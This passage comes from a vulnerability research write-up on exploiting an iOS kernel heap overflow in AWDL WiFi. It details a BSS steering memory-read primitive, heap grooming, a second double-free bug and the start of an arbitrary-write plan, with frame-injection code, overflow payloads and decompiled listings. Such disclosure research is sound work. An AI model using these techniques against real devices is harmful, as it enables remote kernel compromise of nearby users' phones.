In IO80211AWDLPeerManager::handleUmiTimer the IO80211AWDLPeerManager walks a linked-list of peers (a separate linked-list from that used to store all the peers) and from each of the peers in that list it checks whether that peer and the current device are on the same channel and in an availability window:


if ( peer_manager->current_channel_ == peer->chanseq_channels[peer_manager->current_chanseq_step] ) {

...


If the UMI timer has indeed fired when both this device and the peer from the UMI list are on the same channel in an overlapping availability window then the IO80211AWDLPeerManager removes the peer from the UMI list, reads the bss_steering_blob from the peer and passes it as the last argument to the peer's::sendUnicastMI method.


This passes that blob to IO80211AWDLPeerManager::buildMasterIndicationTemplate to build an AWDL master indication frame before attempting to transmit it.


Let's look at how buildMasterIndicationTemplate uses the steering_msg_blob:


The third argument to buildMasterIndicationTemplate is is_unicast_MI which indicates whether this method was called by IO80211AWDLPeerManager::sendUnicastMI (which sets it to 1) or IO80211AWDLPeerManager::updatePrimaryPayloadMI (which sets it to 0.)


If buildMasterIndicationTemplate was called to build a unicast MI frame and the peer's feature_mask field has 0xD'th bit set then the steering_msg_blob will be passed to IO80211AWDLPeerManager::buildMultiPeerBssSteeringTlv. This method reads a size from the second dword in the steering_msg_blob and checks whether it is smaller than the remaining space in the frame template buffer; if it is, then that size value is used to copy that number of bytes from the steering_msg_blob pointer into a TLV (type 0x1d) in the template frame which will then be sent out over the air!


There's clearly a path here to get a semi-arbitrary read; but actually triggering it will require quite a bit more reversing. We need the UMI timer to be firing and we also need to get a peer into the UMI linked list.

BSS steering state machine

At this point a sensible question to ask is, what exactly is BSS Steering? A bit of googling tells us that it's part of 802.11v; a set of management standards for enterprise networks. One of the advanced features of enterprise networks is the ability to seamlessly move devices between different access points which form part of the same network; for example when you walk around the office with your phone or if there are too many devices associated with one access point. AWDL isn't part of 802.11v. My best guess as to what's happening here is that AWDL is driving the 802.11v AP roaming code to try to move AWDL clients on to a common infrastructure network. I think this code was added to support Sidecar, but everything below is based only on static reversing.


IO80211PeerBssSteeringManager::bssSteeringStateMachine is responsible for driving the BSS steering state machine. The first argument is a bssSteeringEvent enum value representing an event which the state machine should process. Using the IO80211PeerBssSteeringManager::getEventName method we can determine the names for all the events which the state machine will process and using the IO80211PeerBssSteeringManager::getStateName method we can determine the names of the states which the state machine can be in. Again using the local types window in IDA we can define enums for these which will make the HexRays decompiler output much more readable:


enum BSSSteeringState

{

  BSS_STEERING_STATE_IDLE = 0x0,

  BSS_STEERING_STATE_PRE_STEERING_SYNC_EVAL = 0x1,

  BSS_STEERING_STATE_ASSOCIATION_ONGOING = 0x2,

  BSS_STEERING_STATE_TX_CONFIRM_AWAIT = 0x3,

  BSS_STEERING_STATE_STEERING_SYNC_CONFIRM_AWAIT = 0x4,

  BSS_STEERING_STATE_STEERING_SYNCED = 0x5,

  BSS_STEERING_STATE_STEERING_SYNC_FAILED = 0x6,

  BSS_STEERING_STATE_SELF_STEERING_ASSOCIATION_ONGOING = 0x7,

  BSS_STEERING_STATE_STEERING_SYNC_POST_EVAL = 0x8,

  BSS_STEERING_STATE_SUSPEND = 0x9,

  BSS_STEERING_INVALID = 0xA,

};


enum bssSteeringEvent

{

 BSS_STEERING_MODE_ENABLE = 0x0,

 BSS_STEERING_RECEIVED_DIRECTED_STEERING_CMD = 0x1,

 BSS_STEERING_DO_PRESYNC_EVAL = 0x2,

 BSS_STEERING_PRESYNC_EVAL_DONE = 0x3,

 BSS_STEERING_SELF_INFRA_LINK_CHANGED = 0x4,

 BSS_STEERING_DIRECTED_STEERING_CMD_SENT = 0x5,

 BSS_STEERING_DIRECTED_STEERING_TX_CONFIRM_RXED = 0x6,

 BSS_STEERING_SYNC_CONFIRM_ATTEMPT = 0x7,

 BSS_STEERING_SYNC_SUCCESS_EVENT = 0x8,

 BSS_STEERING_SYNC_FAILED_EVENT = 0x9,

 BSS_STEERING_OVERALL_STEERING_TIMEOUT = 0xA,

 BSS_STEERING_DISABLE_EVENT = 0xB,

 BSS_STEERING_INFRA_LINK_CHANGE_TIMEOUT = 0xC,

 BSS_STEERING_SELF_STEERING_REQUESTED = 0xD,

 BSS_STEERING_SELF_STEERING_DONE = 0xE,

 BSS_STEERING_SUSPEND_EVENT = 0xF,

 BSS_STEERING_RESUME_EVENT = 0x10,

 BSS_STEERING_REMOTE_STEERING_TRIGGER = 0x11,

 BSS_STEERING_PEER_INFRA_LINK_CHANGED = 0x12,

 BSS_STEERING_REMOTE_STEERING_FAILED_EVENT = 0x13,

 BSS_STEERING_INVALID_EVENT = 0x14,

};


The current state is maintained in a steering context object, owned by the IO80211PeerBssSteeringManager. Reverse engineering the state machine code we can come up with the following rough definition for the steering context object:


struct __attribute__((packed)) BssSteeringCntx

{

  uint32_t first_field;

  uint32_t service_type;

  uint32_t peer_count;

  uint32_t role;

  struct ether_addr peer_macs[8];

  struct ether_addr infraBSSID;

  uint8_t pad4[6];

  uint32_t infra_channel_from_datapath_tlv;

  uint8_t pad8[8];

  char ssid[32];

  uint8_t pad1[12];

  uint32_t num_peers_added_to_umi;

  uint8_t pad_10;

  uint8_t pendingTransitionToNewState;

  uint8_t pad7[2];

  enum BSSSteeringState current_state;

  uint8_t pad5[8];

  struct IOTimerEventSource *bssSteeringExpiryTimer;

  struct IOTimerEventSource *bssSteeringStageExpiryTimer;

  uint8_t pad9[8];

  uint32_t steering_policy;

  uint8_t inProgress;

};


Our goal here is reach IO80211AWDLPeer::populateBssSteeringMsgBlob which is called by IO80211PeerBssSteeringManager::processPostSyncEvaluation which is called when the state machine is in the BSS_STEERING_STATE_STEERING_SYNC_POST_EVAL state and receives the BSS_STEERING_PRESYNC_EVAL_DONE event.

Navigating the state machine

Each time a state is evaluated it can change the current state and optionally set the stateMachineTriggeredEvent variable to a new event and set sendEventToNewState to 1. This way the state machine can drive itself forwards to a new state. Let's try to find the path to our target state:


The state machine begins in BSS_STEERING_STATE_IDLE. When we send the BSS steering TLV for the first time this injects either the BSS_STEERING_REMOTE_STEERING_TRIGGER or BSS_STEERING_RECEIVED_DIRECTED_STEERING_CMD event depending on whether the steeringMsgID in the TLV was was 6 or 0.


This causes a call to IO80211PeerBssSteeringManager::processBssSteeringEnabled which parses a steering_msg structure which itself was parsed from the bss steering tlv; we'll take a look at both of those in a moment. If the steering manager is happy with the contents of the steering_msg structure from the TLV it starts two IOTimerEventSources: the bssSteeringExpiryTimer and the bssSteeringStageExpiryTimer. The SteeringExpiry timer will abort the entire steering process when it triggers, which happens after a few seconds. The StageExpiry timer allows the state machine to make progress asynchronously. When it expires it will call the IO80211PeerBssSteeringManager::bssSteeringStageExpiryTimerHandler function, a snippet of which is shown here:


  cntx = this->steering_cntx;

  if ( cntx && cntx->pendingTransitionToNewState )

  {

    current_state = cntx->current_state;

    switch ( current_state )

    {

      case BSS_STEERING_STATE_PRE_STEERING_SYNC_EVAL:

        event = BSS_STEERING_DO_PRESYNC_EVAL;

        break;

      case BSS_STEERING_STATE_ASSOCIATION_ONGOING:

      case BSS_STEERING_STATE_SELF_STEERING_ASSOCIATION_ONGOING:

        event = BSS_STEERING_INFRA_LINK_CHANGE_TIMEOUT;

        break;

      case BSS_STEERING_STATE_STEERING_SYNC_CONFIRM_AWAIT:

        event = BSS_STEERING_SYNC_CONFIRM_ATTEMPT;

        break;

      default:

        goto ERR;

    }

    result = this->bssSteeringStateMachine(this, event, ...


We can see here the four state transitions which may happen asynchronously in the background when the StageExpiry timer fires and causes events to be injected.


From BSS_STEERING_STATE_IDLE, after the timers are initialized the code sets the pendingTranstionToNewState flag and updates the state to BSS_STEERING_STATE_PRE_STEERING_SYNC_EVAL:


  this->steering_cntx->pendingTransitionToNewState = 1;

  state = BSS_STEERING_STATE_PRE_STEERING_SYNC_EVAL;


We can now see that this will cause the the BSS_STEERING_DO_PRESYNC_EVAL event to be injected into the steering state machine and we reach the following code:


  case BSS_STEERING_STATE_PRE_STEERING_SYNC_EVAL:

   {

     if ( EVENT == BSS_STEERING_DO_PRESYNC_EVAL ) {

       steering_policy = this->processPreSyncEvaluation(cntx);

       ...


Here the BSS steering TLV gets parsed and reformatted into a format suitable for the BSS steering code, presumably this is the compatibility layer between the 802.11v enterprise WiFi BSS steering code and AWDL.


We need the IO80211PeerBssSteeringManager::processPreSyncEvaluation to return a steering_policy value of 7. The code which determines this is very complicated; in the end it turns out that if the target device is currently connected to a 5Ghz network on a non-DFS channel then we can get it to return the right steering policy value to reach BSS_STEERING_STATE_STEERING_SYNC_POST_EVAL. DFS channels are dynamic and can be disabled at runtime if radar is detected. There's no requirement that the attacker is also on the same 5GHz network. There might also be another path to reach the required state but this will do.


At this point we finally reach processPostSyncEvaluation and the steeringMsgBlob will be allocated and the UMI timer armed. When it starts firing the code will attempt to read the steering_msg_blob pointer and send the buffer it points to over the air.

Building the read

Let's look concretely at what's required for the read:


We need two spoofer peers:


struct ether_addr reader_peer = *(ether_aton("22:22:aa:22:00:00"));

struct ether_addr steerer_peer = *(ether_aton("22:22:bb:22:00:00"));


The target device needs to be aware of both these peers so we allocate the reader peer by spoofing a frame from it:


inject(RT(),

       WIFI(dst, reader_peer),

       AWDL(),

       SYNC_PARAMS(),

       CHAN_SEQ_EMPTY(),

       HT_CAPS(),

       UNICAST_DATAPATH(0x1307 | 0x800),

       PKT_END());


There are two important things here:


1) This peer will have a channel sequence which is empty; this is crucial as it means we can enforce a gap between the allocation of the steering_msg_blob by processPostSyncEvaluation and its use in the UMI timer. Recall that we saw earlier that the unicast MI template only gets built when the UMI timer fires during a peer availability window; if the peer has no availability windows, then the template won't be updated and the steering_msg_blob won't be used. We can easily change the channel sequence later by sending a different TLV.


2) The flags in the UNICAST_DATAPATH TLV. That 0x800 is quite important, without it this happens:


This tweet from @mdowd on May 27th 2020 mentioned a double free in BSS reachable via AWDL


We'll get to that...


The next step is to allocate the steerer_peer and start steering the reader:


inject(RT(),

      WIFI(dst, steerer_peer),

      AWDL(),

      SYNC_PARAMS(),

      HT_CAPS(),

      UNICAST_DATAPATH(0x1307),

      BSS_STEERING(&reader_peer, 1),

      PKT_END());


Let's look at the bss_steering TLV:


struct bss_steering_tlv {

  uint8_t type;

  uint16_t length;

  uint32_t steeringMsgID;

  uint32_t steeringMsgLen;

  uint32_t peer_count;

  struct ether_addr peer_macs[8];

  struct ether_addr BSSID;

  uint32_t steeringTimeoutThreshold;

  uint32_t SSID_len;

  uint8_t infra_channel;

  uint32_t steeringCmdFlags;

  char SSID[32];

} __attribute__((packed));


We need to carefully choose these values; the important part for the exploit however is that we can specify up to 8 peers to be steered at the same time. For this example we'll just steer one peer. Here we build a bss_steering_tlv with only one peer_mac set to the mac address of reader_peer. If we've set everything up correctly this should cause the IO80211AWDLPeer for the reader_peer object to allocate a steering_msg_blob and start the UMI timer firing trying to send that blob in a UMI


UMI?

UMIs are Unicast Master Indication frames; unlike regular AWDL Master Indication frames UMIs are sent to unicast MAC addresses.


We can now send a final frame:


char overflower[0x80] = {0};

*(uint64_t*)(&overflower[0x50]) = 0x4141414141414141;

 

inject(RT(),

       WIFI(dst, reader_peer),

       AWDL(),

       SYNC_PARAMS(),

       SERV_PARAM(),

       HT_CAPS(),

       DATAPATH(reader_peer),

       SYNC_TREE((struct ether_addr*)overflower,

                  sizeof(overflower)/sizeof(struct ether_addr)),

       PKT_END());


There are two important parts to this frame:


1) We've included a SyncTree TLV which will trigger the buffer overflow. SYNC_TREE will copy the MAC addresses in overflower into the sync_tree_macs inline buffer in the IO80211AWDLPeer:


/* +0x1648 */  struct ether_addr sync_tree_macs[10];

/* +0x1684 */  uint8_t sync_error_count;

/* +0x1685 */  uint8_t had_chanseq_tlv;

/* +0x1686 */  uint8_t pad3[2];

/* +0x1688 */  uint64_t per_second_timestamp;

/* +0x1690 */  uint32_t n_frames_in_last_second;

/* +0x1694 */  uint8_t pad21[4];

/* +0x1698 */  void *steering_msg_blob;

/* +0x16A0 */  uint32_t steering_msg_blob_size;


sync_tree_macs is at offset +0x1648 in the IO80211AWDLPeer object and the steering_msg_blob is at +0x1698 so by placing our arbitrary read target 0x50 bytes in to the SYNC_TREE tlv we'll overwrite the steering_msg_blob, in this case with the value 0x4141414141414141.


2) The other important part is that we no longer send the CHAN_SEQ_EMPTY TLV, meaning this peer will use the channel sequence in the sync_params TLV. This contains a channel sequence where the peer declares they are listening in every Availability Window (AW), meaning that the next time the UMI timer fires while the target device is also in an AW it will read the corrupted steering_msg_blob pointer and try to build a UMI using it. If we sniff for UMI frames coming from the target MAC address (dst in this example) and parse out TLV 0x1d we'll find our (almost) arbitrarily read memory!


In this case of course trying to read from an address like 0x4141414141414141 will almost certainly cause a kernel panic, so we've still got more work to do.

Almost-arbitrary read

There are some important limitations for this read technique: firstly, the steering_msg_blob has its length as the second dword member and that length will be used as the length of memory to copy into the UMI. This means that we can only read from places where the second dword pointed to is a small value less than around 800 (the available space in the UMI frame.) That size also dictates how much will be read. We can work with this as an initial arbitrary read primitive however.


The second limitation is the speed of these reads; in order to steer multiple peers at the same time and therefore perform multiple reads in parallel we'll need some more tricks. For now, the only option is to wait for steering to fail and restart the steering process. This takes around 8 seconds, after which the steering process can be restarted by using a steeringMsgId value of 0 rather than 6 in in the BSS_STEERING TLV. 

What to read

At this point we can get memory sent back to us provided it meets some requirements. Helpfully if the memory doesn't meet those requirements as long as the virtual address was mapped and readable the code won't crash so we have some leeway.


My first idea here was to use the physmap, an (almost) 1:1 virtual mapping of the physical address space in virtual memory. The base of the physmap address is randomized on iOS but the slide is smaller than the physical address space size, meaning there's a virtual address in there you can always read from. This gives you a safe virtual address to dereferences to start trying to find pointers to follow.


It was around this point in the development of the exploit that Apple released iOS 13.3.1 which patched the heap overflow. I wanted to also release at least some kind of demo at this point so I released a very basic proof-of-concept which drove the BSS Steering state machine far enough to read from the physmap along with a little javascript snippet you could run in Safari to spray physical memory to demonstrate that you really were reading user data. Of course, this isn't all that compelling; the more compelling demo is still a few months down the road.


Discussing these problems with fellow Project Zero researchers Brandon Azad and Jann Horn, Brandon mentioned that on iOS the base of the zone map, used for most general kernel heap allocations, wasn't very randomized at all. I had looked at this using DTrace on MacOS and it seemed fairly randomized, but dumping kernel layout information on iOS isn't quite as trivial as setting a boot argument to disable SIP and enable kernel DTrace.


Brandon had recently finished the exploit for his oob_timestamp bug and as part of that he'd made a spreadsheet showing various values such as the base of the zone and kalloc maps across multiple reboots. And indeed, the randomization of the base of the zone map is very minimal, around 16 MB:


kASLR

sane_size

zone_min

zone_max

04da4000

72fac000

ffffffe000370000

ffffffe02b554000

080a4000

73cac000

ffffffe0007bc000

ffffffe02be80000

08b28000

73228000

ffffffe00011c000

ffffffe02b3ec000

0bbb0000

721a4000

ffffffe0005bc000

ffffffe02b25c000

0c514000

7383c000

ffffffe000650000

ffffffe02bb68000

0d4d4000

72880000

ffffffe0002d8000

ffffffe02b208000

107d4000

7357c000

ffffffe00057c000

ffffffe02b98c000

12c08000

73148000

ffffffe000598000

ffffffe02b814000

13fb8000

71d98000

ffffffe000714000

ffffffe02b230000

184fc000

73854000

ffffffe00061c000

ffffffe02bb3c000


Using the Service Response Descriptor TLV technique we can allocate 16MB of memory in just a handful of frames, which means we should stand a reasonable chance of being able to safely find our allocations on the heap.

Finding ourselves

What would we like to read? We've discussed before that in order to safely corrupt the fields after the vtable in the IO80211AWDLPeer object we'll need to know a PAC'ed vtable pointer so we'd like to read one of those. If we're able to find one of those we'll also know the address of at least one IO80211AWDLPeer object.


If you make enough allocations of a particular size in iOS they will tend to go from lower addresses to higher addresses. Apple has introduced various small randomizations into exactly how objects are allocated but they're not relevant if we just examine the overall trend, which is to try to fill the virtual memory area reserved for the zone map from bottom to top.


As the maximum slide value of the zone map is smaller than its size there will be a virtual address which is always inside the zone map


The insufficient randomization of the zone map base gives us quite a large virtual memory region I've dubbed the safe probe region where, provided we go approximately from low to high we can safely read.


Our heap groom is as follows:


We send a large number of service_response TLVs, each of which has the following form:


struct service_response_16k_id_tlv sr = {0};

 

sr.type = 2;

sr.len = sizeof(struct service_response_16k_id_tlv) - 3;

sr.s_1 = 2;

sr.key_buf[0] = 'A';

sr.key_buf[1] = 'B';

sr.v_1 = 0x4000;

sr.v_2 = 0x1648; // offset

sr.val_buf[0] = 6;  // msg_type

sr.val_buf[1] = 0x320; // msg_id

sr.val_buf[2] = 0x41414141; // marker

sr.val_buf[3] = val; // value


Each of these TLVs causes the target device to make a 16KB kalloc allocation (one physical page) and then at offset +0x1648 in there write the following 4 dwords:


6

0x320

0x41414141

counter


The counter value increments by one for each TLV we send.


We put 39 of these TLVs in every frame which will result in the allocation of 39 physical pages, or over 600kb, for each AWDL frame we send, allowing us to rapidly allocate memory.


We split the groom into three sections, first sending a number of these spray frames, then a number of spoofed peers to cause the allocation of a large number of IO80211AWDLPeer objects. Finally we send another large number of the service response TLVs.


This results in a memory layout approximating this:


Inside the safe probe region we aim to place a number of IO80211AWDLPeer objects, surrounded by service_response groom pages with approximately incrementing counter values


If we now use the BSS Steering arbitrary read primitive to read from near the bottom of the safe probe region at offset +0x1648 from page boundaries, we should hopefully soon find one of the service_response TLV buffers. Since each service_response groom contains a unique counter which we can then read, we can make a guess for the distance between this discovered service_response buffer and the middle of where we think target peers will be and so compute a new guess for the location of a target peer. This approach lets us do something like a binary search to find an IO80211AWDLPeer object reasonably efficiently


Why did I choose to read from offset +0x1648? Because that's also the offset of the sync_tree_macs buffer in the IO80211AWDLPeer where we can place arbitrary data. Each of those middle target peers is created like this:


struct peer_fake_steering_blob {

  uint32_t msg_id;

  uint32_t msg_len;

  uint32_t magic; // 0x43434343 == peer

  struct ether_addr mac; // the MAC of this peer

  uint8_t pad[32];

} __attribute__((packed));

 

struct peer_fake_steering_blob fake_steerer = {0};

 

fake_steerer.msg_id = 6;

fake_steerer.msg_len = 0x320;

fake_steerer.magic = 0x43434343;

fake_steerer.mac = target_groom_peer;

 

inject(RT(),

  WIFI(dst, target_groom_peer),

  AWDL(),

  SYNC_PARAMS(),

  SERV_PARAM(),

  HT_CAPS(),

  DATAPATH(target_groom_peer),

  SYNC_TREE((struct ether_addr*)&fake_steerer,

            sizeof(struct peer_fake_steering_blob)

              /sizeof(struct ether_addr)),

  PKT_END());


The magic value 0x43434343 lets us determine whether our read has found a service_response buffer or a peer. Following that we put the spoofed MAC address of this peer. This allows us to determine which peer has the address we guessed. If we do manage to find a peer allocation we can then examine the remaining bytes of disclosed memory; there's a high probability that following this peer is another peer, and we've disclosed the first few dozen bytes of it. Here's a hexdump of a successfully located peer:


An annotated hexdump of the disclosed memory when two neighbouring IO80211AWDLPeer objects are found. Here you can see the runtime values of the fields in the peer header, including the PAC'ed vtable pointer


We can see here that we have managed to find two peers next to each other. We'll call these lower_peer and upper_peer. By placing each sprayed peer's MAC address in the sync_tree_macs array we're able to determine both lower_peer and upper_peer's MAC address. Since we know which guessed virtual address we chose we also know the virtual addresses of lower_peer and upper_peer, and from the PAC'ed vtable pointer we can compute the KASLR slide.


From now on we can easily and repeatedly corrupt the fields seen above by sending a large sync tree TLV containing a modified version of this dumped memory:


Using the disclosed memory we can safely manipulate the lower fields in upper_peer using the SyncTree buffer overflow

A mild panic?

Accidental 0day 1 of 2

During my experiments to get the BSS Steering state machine working and into the desired state where it would send UMIs, I noticed that the target device would sometimes kernel panic, even when I was very sure that I hadn't triggered the heap overflow vulnerability. As it turns out, I was accidentally triggering another zero-day vulnerability...


oops!


This was slightly concerning as it had now been months since I had reported the first AWDL-based vulnerability to Apple and a fix for that had already shipped. One my early hopes for Project Zero would be that we could have a "research amplification" effect: we would invest significant effort in publicly less-understood areas of vulnerability research and exploitation and present our results to the affected vendors who would then use their significantly greater resources to continue this research. Vendors have resources such as source code and design documents which should make it vastly easier to audit many of these attack surfaces - we would be keen to assist in this second phase as well.


A more pragmatic view of reality is that whilst the security and product teams do want to continue our research, and do have many more resources, the one important resource they lack is time. Justifying the benefits of fixing a vulnerability which will become public in 90 days is easy but extracting the maximum value from that external report by investing a significant amount of time is much harder to justify; these teams already have other goals and targets for the quarter. Time is the key resource which makes Project Zero successful; we don't have to do vulnerability triage, or design review, or fix bugs or any of the other things typical product security teams have to do.


I mention this because I stumbled over (and reported to Apple) not one but two more remotely-exploitable radio-proximity 0-day vulnerabilities during this research, the first of which appears to have been at least on some level known about:



Mark Dowd is the co-founder of Azimuth, an Australian "market-leading information security business". 


It's well known to all vulnerability researchers that the easiest way to find a new vulnerability is to look very closely at the code near a vulnerability which was recently fixed. They are rarely isolated incidents and usually indicate a lack of testing or understanding across an entire area.


I'm emphasising this point because Mark Dowd's tweet above is claiming knowledge of a variant that wasn't so difficult to find. One that was so easy to find, in fact, that it falls out by accident if you make the slightest mistake when doing BSS Steering. 


We saw the function IO80211AWDLPeer::populateBssSteeringMsgBlob earlier; it's responsible for allocating and populating the steering_msg_blob buffer which will end up as the contents of the 0x1d TLV sent in a AWDL BSS Steering UMI.


At the beginning of the function they check whether this peer already has steering_msg_blob:


if (this->steering_msg_blob && this->steering_msg_blob_size) {

  ...

  kfree(this->steering_msg_blob, this->steering_msg_blob_size);

  this->steering_msg_blob = 0LL;

}


If it does have one it gets free'd and NULL-ed out.


They then compute the size of the new steering_msg_blob, allocate it and fill it in:


steering_blob_size = *(_DWORD *)(msg + 0x3C) + 0x4F;

this->steering_msg_blob = kalloc(steering_blob_size);

...

this->steering_blob_size = steering_blob_size;


All ok.


Right at the end of the function they then try to add the peer to the "UMI chain" - this is this other linked list of peers with pending UMIs which we saw earlier:


err = 0;

if (this->addPeerToUmiChain()) {

  if ( peer_manager

      && peer_manager->isSafeToSendUmiNow(

  this->chanseq_channels[peer_manager->current_chanseq_step + 1],0)) {

    err = 0;

    // in a shared AW; force UMI timer to expire now

    peer_manager->UMITimer->setTimeoutMS(0)

  }

} else {

  kfree(this->steering_msg_blob, this->steering_msg_blob_size);

  this->UMI_feature_mask = 0;

  err = 0xE00002BC;

}

return err;


If the peer gets successfully added to the UMI chain, they test whether they could send the UMI right now (if both this device and the target are in AW's on the same channel). If so, they force the UMI timer to expire, which triggers the code we saw earlier to read the steering_msg_blob, build the UMI template and send it.


However, if addPeerToUmiChain fails then the steering_msg_blob is freed. But unlike the earlier kfree, this time they don't NULL out the pointer before returning. The vulnerability here is that that field is expected to be the owner of that allocation; so if we can somehow come back into populateBssSteeringMsgBlob again this same value will be freed a second time.


There's an even easier way to trigger a double-kfree however: by doing nothing.


After a period of inactivity the IO80211AWDLPeer object will be destructed and free'd. As part of that the IO80211AWDLPeer::freeResources will be called, which does this:


steering_msg_blob = this->steering_msg_blob;

if ( steering_msg_blob ) {

  kfree(steering_msg_blob, this->steering_msg_blob_size);

  this->steering_msg_blob = 0LL;

  this->steering_msg_blob_size = 0;

}


This will see a value for steering_msg_blob which has already been freed and free it a second time. If an attacker were able to reallocate the buffer in between the two frees they could get that controlled object freed, leading to a use-after-free.


It actually took some reversing effort to work out how to make addPeerToUmiChain not fail. The trick is that the peer needs to have sent a datapath TLV with the 0x800 flag set in the first dword, and that's why we set that flag.


This vulnerability also opens a different possibility for the initial memory disclosure. By steering multiple peers it's possible to use this to construct a primitive where the target device will attempt to send a UMI containing memory from a steering_msg_blob which has been freed. With some heap grooming this could allow the disclosure of both a stale allocation as well as out-of-bounds data without needing to guess pointers. In the end I chose to stay with the low zone_map entropy technique as I also wanted to try to land this remote kernel exploit using only a single vulnerability.


We'll get back to the exploit now and take a look at accidental 0day 2 of 2 later on...

The path to a write

We've seen that the peer objects seem to be accessed frequently in the background, not just when we're sending frames. This is important to bear in mind as we search for our next corruption target.


One option could be to use the arbitrary free primitive. Maybe we could free a peer object but this would be tricky as the memory allocator would write metadata over the vtable pointer and the peer might be used in the background before we got a chance to ensure it was safe.


Another possibility could be to cause a type confusion. It's possible that you could find a useful gadget with such a primitive but I figured I'd keep looking for something else.


At this point I started going through more AWDL code looking for all indirect writes I could find. Being able to write even an uncontrolled value to an arbitrary address is usually a good stepping-stone to a full arbitrary memory write primitive.


There's one indirect write which stood out as particularly interesting; right at the start of IO80211AWDLPeer::actionFrameReport:


  peer_manager = this->peer_manager;

  frame_len = mbuf_len(frame_mbuf);

  peer_manager->total_bytes_received += frame_len;

  ++this->n_frames_in_last_second;

  per_second_timestamp = this->per_second_timestamp;

  absolute_time_now = mach_absolute_time();

  frames_in_last_second = this->n_frames_in_last_second;

  if ( ((absolute_time_now - per_second_timestamp) / 1000000)

        > 1024 )// more than 1024ms difference

  {

    if ( frames_in_last_second >= 0x21 )

      IO80211Peer::logDebug(

        (IO80211Peer *)this,

        "%s[%d] : Received %d Action Frames from peer %02X:%02X:%02X:%02X:%02X:%02X in 1 second. Bad Peer\n",

        "actionFrameReport",

        1533LL,

        frames_in_last_second,

        this->peer_mac.octet[0],

        this->peer_mac.octet[1],

        this->peer_mac.octet[2],

        this->peer_mac.octet[3],

        this->peer_mac.octet[4],

        this->peer_mac.octet[5]);

    this->per_second_timestamp = mach_absolute_time();

    this->n_frames_in_last_second = 1;

  }

  else if ( frames_in_last_second >= 0x21 )

  {

    *(_DWORD *)(a2 + 20) = 1;

    return 0;

  }

  ... // continue on to parse the frame


Those first three lines of the decompiler output are exactly the kind of indirect write we're looking for:


  peer_manager = this->peer_manager;

  frame_len = mbuf_len(frame_mbuf);

  peer_manager->total_bytes_received += frame_len;


The peer_manager field is at offset +0x28 in the peer object, easily corruptible with the linear overflow. The total_bytes_received field is a u32 at offset +0x7c80 in the peer manager, and frame_len is the length of the WiFi frame we send so we can set this to an arbitrary value, albeit at least 0x69 (the minimum AWDL frame size) and less than 1200 (potentially larger with fragmentation but it wouldn't help much). That arbitrary value would then get added to the u32 at offset +0x7c80 from the peer_manager pointer. This would be enough to do a byte-by-byte write of arbitrary memory, presuming you knew what was there before:


By corrupting upper_peer's peer_manager pointer then spoofing a frame from upper_peer we can cause an indirect write through the corrupted peer_manager pointer. The peer_manager has a dword field at offset +0x7c80 which counts the total number of bytes received from all peers; actionFrameReport will add the length of the frame spoofed from upper_peer to the dword at the corrupted peer_manager pointer + 0x7c80 giving us an arbitrary add primitive


We do have a limited read primitive already, probably enough to bootstrap ourselves to a full arbitrary read and therefore full arbitrary write. We can indeed reach this code with a corrupted peer_manager pointer and get an arbitrary add primitive. There's just one tiny problem, which will take many more weeks to solve: We'll panic immediately after the write.

Getting the timing right

Although the IO80211AWDLPeer's peer_manager field doesn't appear to be used often in the background (unlike the vtable), the peer_manager field will be used later on in the actionFrameReport method, and since we're trying to write to arbitrary addresses it will almost certainly cause a panic.


Looking at the code, there is only one safe path out of actionFrameReport:


  if ( ((absolute_time_now - per_second_timestamp) / 1000000)

        > 1024 )// more than 1024ms difference

  {

    if (frames_in_last_second >= 0x21)

      IO80211Peer::logDebug(

        (IO80211Peer *)this,

        "%s[%d] : Received %d Action Frames from peer %02X:%02X:%02X:%02X:%02X:%02X in 1 second. Bad Peer\n",

        "actionFrameReport",

        1533LL,

        frames_in_last_second,

        this->peer_mac.octet[0],

        this->peer_mac.octet[1],

        this->peer_mac.octet[2],

        this->peer_mac.octet[3],

        this->peer_mac.octet[4],

        this->peer_mac.octet[5]);

    this->per_second_timestamp = mach_absolute_time();

    this->n_frames_in_last_second = 1;

  }

  else if ( frames_in_last_second >= 0x21 )

  {

    *(_DWORD *)(a2 + 20) = 1;

    return 0;

  }


We have to reach that return 0 statement, which means we need the first if clause to be false, and the second one to be true.


The first statement checks whether more than 1024 ms have elapsed since the per_second_timestamp was updated.


The second statement checks whether more than 32 frames have been received since the per_second_timestamp was last updated.


So to reach the return 0 and avoid the panics due to an invalid peer_manager pointer we'd need to ensure that 32 frames have been received from the same spoofed peer within a 1024ms period.


You are hopefully starting to see why the ACK sniffing model vs the timing model is advantageous now; if the target had only received 31 frames then attempting the arbitrary add would cause a kernel panic.


Recall that at this point however I'm using a 2.4Ghz only WiFi adaptor for injection and monitoring and the only data rate I can get to work is 1Mbps. Actually getting 33 frames onto the air inside 1024ms, especially as only a fraction of that time will be AWDL Availability Windows, is probably impossible.


Furthermore, as I suddenly need far more accuracy in terms of knowing whether frames were received or not, I start to notice how unreliable my monitor device is. It appears to be frequently dropping frames, with an error rate seemingly positively-correlated with how long the adapter has been plugged in. After a while my testing model includes having to unplug the injection and monitoring adaptors after each test to let them cool down. This hopefully gives a taste of how frustrating many parts of this exploit development processes were. Without a stable and fast testing setup prototyping ideas is painfully slow, and figuring out whether an idea didn't work is made harder because you never know if your idea didn't work, or if it was yet another hardware failure.

Changing the clocks

It's probably impossible to make the timing checks pass using intended behaviour with the current setup. But we still have a few tricks up our sleeve. We do have a memory corruption vulnerability after all.


Looking at the two relevant fields per_second_timestamp and n_frames_in_last_second we notice that they're at the following offsets:


/* +0x1648 */  struct ether_addr sync_tree_macs[10];

/* +0x1684 */  uint8_t sync_error_count;

/* +0x1685 */  uint8_t had_chanseq_tlv;

/* +0x1686 */  uint8_t pad3[2];

/* +0x1688 */  uint64_t per_second_timestamp;

/* +0x1690 */  uint32_t n_frames_in_last_second;

/* +0x1694 */  uint8_t pad21[4];

/* +0x1698 */  void *steering_msg_blob;

/* +0x16A0 */  uint32_t steering_msg_blob_size;


So the timestamp (which is absolute, not relative) and the frame count are just after the sync tree buffer which we can overflow out of meaning we can reliably corrupt them and provide a fake timestamp and count.


Arbitrary add idea 1: clock synchronization

My first idea was to try to determine the delta between the target device's absolute clock and the raspberry pi running the exploit. Then safely triggering an arbitrary add would be a three step process:


1) Compute a valid per_second_timestamp value at a point just in the future and do a short overflow within upper_peer to give it that arbitrary timestamp and a high n_frames_in_last_second value.


2) Do a long overflow from lower_peer to corrupt upper_peer's peer_manager pointer to point 0x7c80 bytes below the arbitrary add target.


